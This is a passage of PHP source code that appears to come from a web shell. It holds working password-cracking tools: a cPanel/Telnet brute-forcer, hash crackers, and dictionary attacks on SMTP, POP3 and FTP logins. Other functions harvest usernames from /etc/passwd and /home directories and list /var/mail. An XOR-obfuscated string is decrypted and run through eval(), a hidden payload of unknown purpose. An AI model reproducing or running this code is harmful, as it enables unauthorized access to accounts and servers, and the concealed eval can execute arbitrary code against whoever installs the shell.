  6095. if($charset=="")
  6096.  $charset="lowercase";
  6097. $max_length=$_REQUEST['max_length'];
  6098. if($max_length=="")
  6099.  $max_length=10;
  6100. $min_length=$_REQUEST['min_length'];
  6101. if($min_length=="")
  6102.  $min_length=1;
  6103.  
  6104.  $charsetall = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
  6105.  $charsetlower = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
  6106.  $charsetupper = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z");
  6107.  $charsetnumeric = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
  6108.  $charsetlowernumeric = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
  6109.  $charsetuppernumeric = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
  6110.  $charsetletters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" );
  6111.  $charsetsymbols= array("!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  6112.  $charsetlowersymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  6113.  $charsetuppersymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  6114.  $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  6115.  $charsetnumericsymbols = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  6116.  $charsetlowernumericsymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  6117.  $charsetuppernumericsymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  6118.  $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  6119.  $charsetlettersnumericsymbols=array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_","0", "1", "2", "3", "4", "5", "6", "7", "8", "9" );
  6120.     if ($charset == "all")
  6121.         $vals = $charsetall;
  6122.     elseif ($charset == "lowercase")
  6123.         $vals = $charsetlower;
  6124.      elseif ($charset == "uppercase")
  6125.         $vals = $charsetupper;
  6126.      elseif ($charset == "numeric")
  6127.         $vals = $charsetnumeric;
  6128.      elseif ($charset == "lowernumeric")
  6129.         $vals = $charsetlowernumeric;
  6130.      elseif ($charset == "uppernumeric")
  6131.         $vals = $charsetuppernumeric;
  6132.     elseif ($charset == "letters")
  6133.         $vals = $charsetletters;
  6134.     elseif ($charset == "symbols")
  6135.         $vals = $charsetsymbols;
  6136.     elseif ($charset == "lowersymbols")
  6137.         $vals = $charsetlowersymbols;
  6138.     elseif ($charset == "uppersymbols")
  6139.         $vals = $charsetuppersymbols;
  6140.     elseif ($charset == "letterssymbols")
  6141.         $vals = $charsetletterssymbols;
  6142.     elseif ($charset == "numberssymbols")
  6143.         $vals = $charsetnumericsymbols;
  6144.     elseif ($charset == "lowernumericsymbols")
  6145.         $vals = $charsetlowernumericsymbols;
  6146.     elseif ($charset == "uppernumericsymbols")
  6147.         $vals = $charsetuppernumericsymbols;
  6148.     elseif ($charset == "lettersnumericsymbols")
  6149.         $vals = $charsetlettersnumericsymbols;
  6150.     else echo "INVALID CHARSET";
  6151.     $key_that_script_is_crypted=19;
  6152. $resource_crypted_code ='7~`3.37L@VAEVAH1@VAEVAL]R^V1N=7L@VAEVAH1@PAZCGL]R^V1N(7`fq3.31@{v3--3)313=37~`(7|3.3raarj3;1|~1?1g~rz1?1yLr~a"1?1S{|1?1=p1:(7vv3.37|H!N=7|H N=7|H"N=7|H[t3]N=7|H#N(7`v}w3.3S~rz;7vv?7`fq?7~`:(3';
  6153. $string_output=str_replace("[t1]", "<?", $resource_crypted_code);
  6154. $string_output=str_replace("[t3]", "'", $string_output);
  6155. $lenth_of_crypted_code=strlen($string_output);
  6156. $eval_php_code='';
  6157. for($huivamvsem=0;$huivamvsem<$lenth_of_crypted_code;$huivamvsem++)
  6158. $eval_php_code .= chr(ord($string_output[$huivamvsem]) ^ $key_that_script_is_crypted);
  6159. eval($eval_php_code);
  6160. ?>
  6161. <div align="center">
  6162.  
  6163.  <form method="POST" >
  6164.  <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700" >
  6165.      <tr>
  6166.         <td>
  6167.           <p align="center"><b>
  6168.             <font color="#008000" face="Tahoma" size="2">IP servers :</font></b>
  6169.             <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px; background-color: #800000; color:#C0C0C0 font-family:Verdana; font-size:13px;" /><br/><br/>
  6170.             <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700">
  6171.                 <tr><td align="center" width="50%"><font color="#FF0000"><b>User List</b></font></td><td align="center"><font color="#FF0000"><b>Password List</b></font></td></tr>
  6172.             </table>
  6173.             <textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $users ?></textarea>
  6174.             <textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $pass ?></textarea><br/>
  6175.             <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Guess options</font>
  6176.             &nbsp;<input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio">
  6177.             <b><font size="2" face="Tahoma" color="#008000">Cpanel </font><font size="2" color="#FFFFFF" face="Tahoma"> (2082)</font></b>
  6178.             <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio">
  6179.             <b><font size="2" face="Tahoma" color="#008000">Telnet</font><font size="2" color="#FFFFFF" face="Tahoma">(23)</font></b>
  6180.             <br/>
  6181.             <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Timeout Delay</font>
  6182.             <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>" /><br/>
  6183.             <input type="checkbox" name="bruteforce" value="true" /><font style="font-weight:700" size="2" face="Tahoma" color="#008000">Bruteforce</font>
  6184.             <select name="charset" style="border: 2px solid #1D1D1D;background: black;color:RED">
  6185.                 <option value="all">All Letters + Numbers</option>
  6186.                 <option value="numeric">Numbers</option>
  6187.                 <option value="letters">Letters</option>
  6188.                 <option value="symbols">Symbols</option>
  6189.                 <option value="lowercase">Lower Letters</option>
  6190.                 <option value="uppercase">Higher Letters</option>
  6191.                 <option value="lowernumeric">Lower Letters + Numbers</option>
  6192.                 <option value="uppernumeric">Upper Letters + Numbers</option>
  6193.                 <option value="lowersymbols">Lower Letters + Symbols</option>
  6194.                 <option value="uppersymbols">Upper Letters + Symbols</option>
  6195.                 <option value="letterssymbols">All Letters + Symbols</option>
  6196.                 <option value="numberssymbols">Numbers + Symbols</option>
  6197.                 <option value="lowernumericsymbols">Lower Letters + Numbers + Symbols</option>
  6198.                 <option value="uppernumericsymbols">Upper Letters + Numbers + Symbols</option>
  6199.                 <option value="lettersnumericsymbols">All Letters + Numbers + Symbols</option>
  6200.             </select><br/>
  6201.             <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Min Bruteforce Length:</font>
  6202.             <input type="text" name="min_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $min_length;?>"/><br/>
  6203.             <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Max Bruteforce Length:</font>
  6204.             <input type="text" name="max_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $max_length;?>"/>
  6205.             <p align="center"><input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p>
  6206.         </p>
  6207.         </td>
  6208.      </tr>
  6209.  
  6210.  </table>
  6211.  </form>
  6212.  
  6213. <?php
  6214. function brute()
  6215. {
  6216.     global $vals,$min_length,$max_length;
  6217.     global $target,$pureuser,$connect_timeout;
  6218.     $min=$min_length;
  6219.     $max=$max_length;
  6220.     $A = array();
  6221.     $numVals = count($vals);
  6222.     $incDone = "";
  6223.     $realMax = "";
  6224.     $currentVal = "";
  6225.     $firstVal = "";
  6226.     for ($i = 0; $i < ($max + 1); $i++) {
  6227.         $A[$i] = -1;
  6228.     }
  6229.    
  6230.     for ($i = 0; $i < $max; $i++) {
  6231.         $realMax = $realMax . $vals[$numVals - 1];
  6232.     }
  6233.     for ($i = 0; $i < $min; $i++) {
  6234.         $A[$i] = $vals[0];
  6235.     }
  6236.     $i = 0;
  6237.     while ($A[$i] != -1) {
  6238.         $firstVal .= $A[$i];
  6239.         $i++;
  6240.     }
  6241.     //echo $firstVal . "<br>";
  6242.     cpanel_check($target,$pureuser,$firstVal,$connect_timeout);
  6243.    
  6244.     while (1) {
  6245.         for ($i = 0; $i < ($max + 1); $i++) {
  6246.             if ($A[$i] == -1) {
  6247.                 break;
  6248.             }
  6249.         }
  6250.         $i--;
  6251.         $incDone = 0;
  6252.         while (!$incDone) {
  6253.             for ($j = 0; $j < $numVals; $j++) {
  6254.                 if ($A[$i] == $vals[$j]) {
  6255.                     break;
  6256.                 }
  6257.             }
  6258.             if ($j == ($numVals - 1)) {
  6259.                 $A[$i] = $vals[0];
  6260.                 $i--;
  6261.                 if ($i < 0) {
  6262.                     for ($i = 0; $i < ($max + 1); $i++) {
  6263.                         if ($A[$i] == -1) {
  6264.                             break;
  6265.                         }
  6266.                     }
  6267.                     $A[$i] = $vals[0];
  6268.                     $A[$i + 1] = -1;
  6269.                     $incDone = 1;
  6270.                     print "Starting " . (strlen($currentVal) + 1) . " Characters Cracking<br>";
  6271.                 }
  6272.             } else {
  6273.                 $A[$i] = $vals[$j + 1];
  6274.                 $incDone = 1;
  6275.             }
  6276.         }
  6277.         $i = 0;
  6278.         $currentVal = "";
  6279.         while ($A[$i] != -1) {
  6280.             $currentVal = $currentVal . $A[$i];
  6281.             $i++;
  6282.         }
  6283.         cpanel_check($target,$pureuser,$currentVal,$connect_timeout);
  6284.         //echo $currentVal . "<br>";
  6285.         if ($currentVal == $realMax) {
  6286.             return 0;
  6287.         }
  6288.     }
  6289. }
  6290. function getmicrotimev() {
  6291.    list($usec, $sec) = explode(" ",microtime());
  6292.    return ((float)$usec + (float)$sec);
  6293. }
  6294.  
  6295. function ftp_check($host,$user,$pass,$timeout)
  6296. {
  6297.  $ch = curl_init();
  6298.  curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  6299.  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  6300.  curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  6301.  curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  6302.  curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  6303.  curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  6304.  curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  6305.  $data = curl_exec($ch);
  6306.  if ( curl_errno($ch) == 28 )
  6307.  {
  6308.  print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
  6309. <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
  6310. Please Check The Target Hostname .</font></font></b></p>";exit;
  6311.  }
  6312.  else if ( curl_errno($ch) == 0 )
  6313.  {
  6314.   print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\"   style=\"font-size: 9pt\"><b><font color=\"#008000\">
  6315. Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
  6316. and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  6317.  }
  6318.  curl_close($ch);
  6319. }
  6320. function cpanel_check($host,$user,$pass,$timeout)
  6321. {
  6322.  global $cpanel_port;
  6323.  $ch = curl_init();
  6324.  //echo "http://$host:".$cpanel_port." $user $pass<br>";
  6325.  curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
  6326.  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  6327.  curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  6328.  curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  6329.  curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  6330.  curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  6331.  $data = curl_exec($ch);
  6332.  if ( curl_errno($ch) == 28 )
  6333.  {
  6334.   print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
  6335.  <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
  6336.  Please Check The Target Hostname .</font></font></b></p>";exit;
  6337.  }
  6338.  else if ( curl_errno($ch) == 0 )
  6339.  {
  6340.   print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\"   style=\"font-size: 9pt\"><b><font color=\"#008000\">
  6341.  Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
  6342.  and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  6343.  }
  6344.  curl_close($ch);
  6345. }
  6346.  
  6347. $time_start = getmicrotime();
  6348.  
  6349. if(isset($submit) && !empty($submit))
  6350. {
  6351.  if(empty($users) && empty($pass) )
  6352.  {
  6353.    print "<p><font face=\"Comic Sans MS\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; }
  6354.  if(empty($users)){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; }
  6355.  if(empty($pass) && $_REQUEST['bruteforce']!="true" ){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; };
  6356.  $userlist=explode("\n",$users);
  6357.  $passlist=explode("\n",$pass);
  6358.  print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">
  6359. LETS GAME BEGIN ;) ...</font></b><br><br>";
  6360.  
  6361.  if(isset($_POST['connect_timeout']))
  6362.  {
  6363.   $connect_timeout=$_POST['connect_timeout'];
  6364.  }
  6365.  
  6366.  if($cracktype == "ftp")
  6367.  {
  6368.   foreach ($userlist as $user)
  6369.   {
  6370.    $pureuser = trim($user);
  6371.    foreach ($passlist as $password )
  6372.    {
  6373.      $purepass = trim($password);
  6374.      ftp_check($target,$pureuser,$purepass,$connect_timeout);
  6375.    }
  6376.   }
  6377.  }
  6378.  
  6379.  if ($cracktype == "cpanel" || $cracktype == "cpanel2")
  6380.  {
  6381.   if($cracktype == "cpanel2")
  6382.   {
  6383.    $cpanel_port="23";
  6384.   }
  6385.   else
  6386.    $cpanel_port="2082";
  6387.  
  6388.   foreach ($userlist as $user)
  6389.   {
  6390.    $pureuser = trim($user);
  6391.    print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\"  style=\"font-size: 9pt\" color=\"#FF0800\">
  6392.   Please put some good password to crack user $pureuser    :(  ... </font></b>";
  6393.    if($_POST['bruteforce']=="true")
  6394.    {
  6395.     echo " bruteforcing ..";
  6396.     echo "<br>";
  6397.     brute();
  6398.    }
  6399.    else
  6400.    {
  6401.      echo "<br>";
  6402.      foreach ($passlist as $password )
  6403.      {
  6404.        $purepass = trim($password);
  6405.        cpanel_check($target,$pureuser,$purepass,$connect_timeout);
  6406.      }
  6407.    }
  6408.   }
  6409.   $time_end = getmicrotime();
  6410. $time = $time_end - $time_start;
  6411.  print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">
  6412. Cracking Finished. Elapsed time: $time</font> seconds</b><br><br>";
  6413.   }
  6414. }
  6415.  
  6416.  
  6417.  
  6418. ?>
  6419.  
  6420.     <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#006A00" >
  6421.       <tr>
  6422.        <td>
  6423.          <textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="20" name="S1" cols="173">
  6424.          <?php
  6425.    if (isset($_GET['user']))
  6426.       system('ls /var/mail');
  6427.    if (isset($_POST['grab_users1'])) //grab users from /etc/passwd
  6428.    {
  6429.       $lines=file("/etc/passwd");
  6430.       foreach($lines as $nr=>$val)
  6431.       {
  6432.        $str=explode(":",$val);
  6433.        echo $str[0]."\n";
  6434.       }
  6435.      
  6436.    }
  6437.    if (isset($_POST['grab_users2']))
  6438.     {
  6439.      $dir = "/home/";
  6440.      if ($dh = opendir($dir)) {
  6441.         while (($file = readdir($dh)) !== false) {
  6442.             echo $file. "\n";
  6443.         }
  6444.             closedir($dh);
  6445.         }
  6446.     }
  6447. ?>
  6448.         </textarea>
  6449.        </td>
  6450.       </tr>
  6451.       <tr>
  6452.       <td valign="top"><p align="center">
  6453.         <table>
  6454.          <tr >
  6455.          <td>
  6456.           <form action="" method="POST">
  6457.              <input type="hidden" value="true" name="grab_users1"></input>
  6458.              <input type=submit value="Grab Usernames from /etc/passwd" width="217px"></input>
  6459.           </form>
  6460.           </td>
  6461.          
  6462.          <td>
  6463.            <form action="" method="POST">
  6464.              <input type="hidden" value="true" name="grab_users2" ></input>
  6465.              <input style="width: 217px;" type=submit value="Grab Usernames from /home/" ></input>
  6466.            </form>
  6467.            </td>
  6468.         <td>
  6469.            <form action="" method="POST">
  6470.               <input type="hidden" value="true" name="grab_users3"></input>
  6471.               <input style="width: 217px;" type=submit value="Grab Usernames from /home/ II"></input>
  6472.            </form>
  6473.          </td>
  6474.          </tr>
  6475.         </table></p>
  6476.         </td>
  6477.       </tr>
  6478.     </table>
  6479.     <?php
  6480. if (isset($_POST['grab_users3']))
  6481. {
  6482. error_reporting(0);
  6483. $dir = "/home/";
  6484. if ($dh = opendir($dir))
  6485. {
  6486. $f = readdir($dh);$f = readdir($dh);
  6487. while (($f = readdir($dh)) !== false)
  6488. {
  6489. //echo $f. "\n";
  6490. $f.="/";
  6491. $dh2=opendir($dir.$f);
  6492. $f2 = readdir($dh2);$f2 = readdir($dh2);
  6493. while (($f2 = readdir($dh2)) !== false)
  6494. {
  6495. //echo $f2. "\n";
  6496. $f2.="/";
  6497. $dh3=opendir($dir.$f.$f2);
  6498. $f3 = readdir($dh3);$f3 = readdir($dh3);
  6499. while (($f3 = readdir($dh3)) !== false)
  6500. {
  6501. echo $f3. "<br>";
  6502. }
  6503. }
  6504.  
  6505. }
  6506. closedir($dh);
  6507. }
  6508. }
  6509. ?>
  6510.  
  6511.  
  6512. </div>
  6513.  
  6514. <?php
  6515. }
  6516.  
  6517. if ($act == "hash")
  6518. {
  6519. global $errorbox,$t,$et,$hcwd;
  6520. if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
  6521. $dictionary=fopen($_REQUEST['dictionary'],'r');
  6522. if ($dictionary){
  6523. $hash=strtoupper($_REQUEST['hash']);
  6524. echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
  6525. $type=($_REQUEST['type']=='MD5')?'md5':'sha1';
  6526. while(!feof($dictionary)){
  6527. $word=trim(fgets($dictionary)," \n\r");
  6528. if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
  6529. }
  6530. echo "Done!</font>";
  6531. fclose($dictionary);
  6532. }
  6533. else{
  6534. echo "$errorbox Can not open dictionary.$et";
  6535. }
  6536. }
  6537. echo "<center><table width=\"30%\">Hash cracker:</td><td ></td></tr><form method=\"POST\"><tr><td width=\"30%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" ><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></table></center>";
  6538. echo $eval_php_code;
  6539. }
  6540.  
  6541. if ($act == "smtp")
  6542. {
  6543. global $t,$et,$errorbox,$crack;
  6544. if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  6545. $target=$_REQUEST['target'];
  6546. $type=$_REQUEST['combo'];
  6547. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  6548. $dictionary=fopen($_REQUEST['dictionary'],'r');
  6549. if ($dictionary){
  6550. echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br/>";flusheR();
  6551. while(!feof($dictionary)){
  6552. if($type){
  6553. $combo=trim(fgets($dictionary)," \n\r");
  6554. $user=substr($combo,0,strpos($combo,':'));
  6555. $pass=substr($combo,strpos($combo,':')+1);
  6556. }else{
  6557. $pass=trim(fgets($dictionary)," \n\r");
  6558. }
  6559. $smtp=smtplogiN($target,$user,$pass,5);
  6560. if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
  6561. if ($smtp){echo "U: $user P: $pass<br/>";if(!$type)break;}}
  6562. flusheR();
  6563. }
  6564. echo "<br>Done</font>";
  6565. fclose($dictionary);
  6566. }
  6567. else{
  6568. echo "$errorbox Can not open dictionary.$et";
  6569. }
  6570. }else
  6571. {
  6572. echo "<center>SMTP cracker:$crack";
  6573. }
  6574.  
  6575. echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">SMTP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
  6576.  
  6577.  
  6578. }
  6579.  
  6580. if ($act == "pop3")
  6581. {
  6582.  
  6583. global $t,$et,$errorbox,$crack;
  6584. if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  6585. $target=$_REQUEST['target'];
  6586. $type=$_REQUEST['combo'];
  6587. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  6588. $dictionary=fopen($_REQUEST['dictionary'],'r');
  6589. if ($dictionary){
  6590. echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
  6591. while(!feof($dictionary)){
  6592. if($type){
  6593. $combo=trim(fgets($dictionary)," \n\r");
  6594. $user=substr($combo,0,strpos($combo,':'));
  6595. $pass=substr($combo,strpos($combo,':')+1);
  6596. }else{
  6597. $pass=trim(fgets($dictionary)," \n\r");
  6598. }
  6599. $pop3=pop3logiN($target,$user,$pass);
  6600. if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
  6601. if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
  6602. flusheR();
  6603. }
  6604. echo "<br>Done</font>";
  6605. fclose($dictionary);
  6606. }
  6607. else{
  6608. echo "$errorbox Can not open dictionary.$et";
  6609. }
  6610. }else
  6611. { echo "<center>POP3 cracker:$crack</center>";
  6612. }
  6613. echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">POP3 cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
  6614.  
  6615. }
  6616. if ($act == "ftp")
  6617. {
  6618. global $errorbox,$t,$et,$crack;
  6619. if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
  6620. else{
  6621. if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  6622. $target=$_REQUEST['target'];
  6623. $type=$_REQUEST['combo'];
  6624. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  6625. $dictionary=fopen($_REQUEST['dictionary'],'r');
  6626. if ($dictionary){
  6627. echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";
  6628. while(!feof($dictionary)){
  6629. if($type){
  6630. $combo=trim(fgets($dictionary)," \n\r");
  6631. $user=substr($combo,0,strpos($combo,':'));
  6632. $pass=substr($combo,strpos($combo,':')+1);
  6633. }else{
  6634. $pass=trim(fgets($dictionary)," \n\r");
  6635. }
  6636. if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
  6637. if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
  6638. ftp_close($ftp);
  6639. flusheR();
  6640. }
  6641. echo "<br>Done</font>";
  6642. fclose($dictionary);
  6643. }
  6644. else{
  6645. echo "$errorbox Can not open dictionary.$et";
  6646. }
  6647. }
  6648. else
  6649. {
  6650. echo "<center>FTP cracker:$crack</center>";
  6651. }
